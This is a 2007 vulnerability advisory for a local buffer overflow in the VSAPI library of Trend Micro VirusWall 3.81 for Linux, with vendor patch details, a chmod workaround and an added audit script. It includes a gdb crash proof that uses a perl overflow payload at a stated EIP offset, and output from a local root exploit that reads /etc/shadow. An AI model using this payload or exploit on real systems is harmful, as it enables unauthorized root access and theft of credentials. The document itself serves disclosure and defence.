
tmvwall381v3_adv.txt

Posted Jan 27, 2007
Authored by Sebastian Wolfgarten

A local buffer overflow vulnerability in the VSAPI library in Trend Micro VirusWall version 3.81 on Linux allows arbitrary code execution and leads to privilege escalation.

tags | advisory, overflow, arbitrary, local, code execution
systems | linux
SHA-256 | 2c17540c6c33d93e818379d4381bc07d96560541c42d1a823b05b1f8a97aec8a

I - TITLE

Security advisory: Buffer overflow in VSAPI library of Trend Micro VirusWall
3.81 for Linux

II - SUMMARY

Description: Local buffer overflow vulnerability in VSAPI library allows
arbitrary code execution and leads to privilege escalation

Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com),
http://www.devtarget.org

Date: January 25th, 2007

Severity: Medium

References: http://www.devtarget.org/trendmicro-advisory-01-2007.txt

III - OVERVIEW

The Trend Micro VirusWall is a software solution to block viruses, spyware,
spam and various other kinds of threats at the Internet gateway. More
information about the product can be found online at
http://www.trendmicro.com/en/products/gateway/isvw/evaluate/overview.htm.

IV - DETAILS

The product "InterScan VirusWall 3.81 for Linux" ships a legacy library
called "libvsapi.so" which contains a memory corruption vulnerability. One
of the applications that apparently uses this library is called "vscan",
which is set suid root by default. It was discovered that this supporting
program is prone to a classic buffer overflow when a particularly long
command-line argument is passed and the application uses the flawed library
to attempt to copy that data into a finite buffer. On a Debian 3.1 test
system, for instance, an attacker is required to supply 1116 + 4 bytes to
completely overwrite the EIP register and thus execute arbitrary code with
root-level privileges:

# /opt/trend/ISBASE/IScan.BASE/vscan -v
Virus Scanner v3.1, VSAPI v6.810-1005
Trend Micro Inc. 1996,1997
Pattern version 684
Pattern number 56446
No scan target specified!! do nothing.

# gdb /opt/trend/ISBASE/IScan.BASE/vscan
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are welcome to change it and/or distribute copies of it under certain
conditions. Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details. This GDB was configured as "i386-linux"...(no debugging symbols
found) Using host libthread_db library "/lib/tls/libthread_db.so.1".

(gdb) run `perl -e 'print "A"x1116 . "B"x4'`
Starting program: /opt/trend/ISBASE/IScan.BASE/vscan `perl -e 'print
"A"x1116 . "B"x4'`
(no debugging symbols found)
Virus Scanner v3.1, VSAPI v6.810-1005
Trend Micro Inc. 1996,1997
Pattern version 684
Pattern number 56446

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) info registers
eax 0xffffffff -1
ecx 0x24 36
edx 0x40277560 1076327776
ebx 0xbffffa03 -1073743357
esp 0xbffff818 0xbffff818
ebp 0x41414141 0x41414141
esi 0xbffff838 -1073743816
edi 0x804f008 134541320
eip 0x42424242 0x42424242
eflags 0x287 647
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51

V - ANALYSIS

The severity of this vulnerability is probably "medium" as by default the
vscan file is only executable by the root user as well as members of
the "iscan" group which is created during the installation of the software:

# ls -la /opt/trend/ISBASE/IScan.BASE/vscan
-r-sr-x--- 1 root iscan 24400 2003-12-20 03:53
/opt/trend/ISBASE/IScan.BASE/vscan

However, administrators may have changed the default permissions and thus
granted all local users the privilege to execute the file. If this library
is also used by other applications, they may also be flawed (unchecked).

VI - EXPLOIT CODE

An exploit for this vulnerability is attached to this email and can also be
found online at http://www.devtarget.org/tmvwall381v3_exp.c. It was
successfully tested on Debian Linux 3.1 with kernel 2.6.8 and leads to a
local privilege escalation:

sebastian@debian31:~$ ./tmvwall381v3_exp

Local root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on Linux)
Author: Sebastian Wolfgarten, <sebastian@wolfgarten.com>
Date: January 3rd, 2007

Okay, /opt/trend/ISBASE/IScan.BASE/vscan is executable and by the way,
your current user id is 5002.

Executing /opt/trend/ISBASE/IScan.BASE/vscan. Afterwards check your privilege
level with id or whoami!

Virus Scanner v3.1, VSAPI v8.310-1002
Trend Micro Inc. 1996,1997
Pattern number 4.155.00

sh-2.05b# id
uid=5002(sebastian) gid=100(users) euid=0(root) groups=100(users),5001(iscan)

sh-2.05b# cat /etc/shadow

root:***REMOVED***:13372:0:99999:7:::
daemon:*:13372:0:99999:7:::
bin:*:13372:0:99999:7:::
sys:*:13372:0:99999:7:::
sync:*:13372:0:99999:7:::
games:*:13372:0:99999:7:::

[...]

iscan:!:13500:0:99999:7:::
sebastian:***REMOVED***:13500:0:99999:7:::

VII - WORKAROUND/FIX

To address this problem, the vendor has released a patch called "InterScan
VirusWall 3.81 for Linux Security Patch - VSAPI module" which is available at
http://www.trendmicro.com/download/product.asp?productid=13&show=patch and
which will replace the flawed library libvsapi.so with a newer version. Hence
all users of the VirusWall product are asked to test and install this patch
as soon as possible. Trend Micro also created a knowledge base article that
covers the problem (see
http://esupport.trendmicro.com/support/viewxml.do?ContentID=EN-1034124&id=EN-1034124).

Furthermore, as a temporary workaround, one may also simply remove the suid
bit from the vscan file and thus render any attack virtually useless by
executing:

# chmod -s /opt/trend/ISBASE/IScan.BASE/vscan

The same holds true for any other (suid root) application that uses this
library.
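
Added example (not part of the original advisory or of the vendor patch): a
shell audit covering both the permission concern in section V and the
workaround above. It lists setuid files under a directory that reference
libvsapi.so and flags those executable by all local users. The function name
audit_vsapi_suid and the byte-search heuristic are assumptions of this
example, as is the use of GNU find, grep and stat.

```shell
#!/bin/sh
# Added example: find setuid files that reference libvsapi.so.
# Heuristic (assumption): a dynamically linked ELF stores the names of the
# libraries it needs as plain text, so a byte search for "libvsapi.so"
# identifies candidate binaries without running them.

# audit_vsapi_suid DIR
# Prints one line per finding: "<mode> <owner>:<group> <path> <exposure>"
audit_vsapi_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null |
    while IFS= read -r f; do
        # Skip setuid files that never mention the library.
        grep -q 'libvsapi\.so' "$f" 2>/dev/null || continue
        mode=$(stat -c '%a' "$f")
        owner=$(stat -c '%U:%G' "$f")
        # An odd last octal digit means the "other" execute bit is set:
        # every local user can run the file, not only root and the group.
        case "$mode" in
            *[1357]) exposure="WORLD-EXECUTABLE" ;;
            *)       exposure="group-restricted" ;;
        esac
        printf '%s %s %s %s\n' "$mode" "$owner" "$f" "$exposure"
    done
}

# Stand-alone use: sh audit.sh /opt/trend
if [ "$#" -gt 0 ]; then
    audit_vsapi_suid "$1"
fi
```

Every path reported is a candidate for the chmod -s workaround until the
patched library is installed; a WORLD-EXECUTABLE result means the default
-r-sr-x--- mode shown in section V has been widened.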

VIII - DISCLOSURE TIMELINE

02. January 2007 - Notified security@trendmicro.com
05. January 2007 - Vulnerability confirmed
21. January 2007 - Release of patch
25. January 2007 - Public disclosure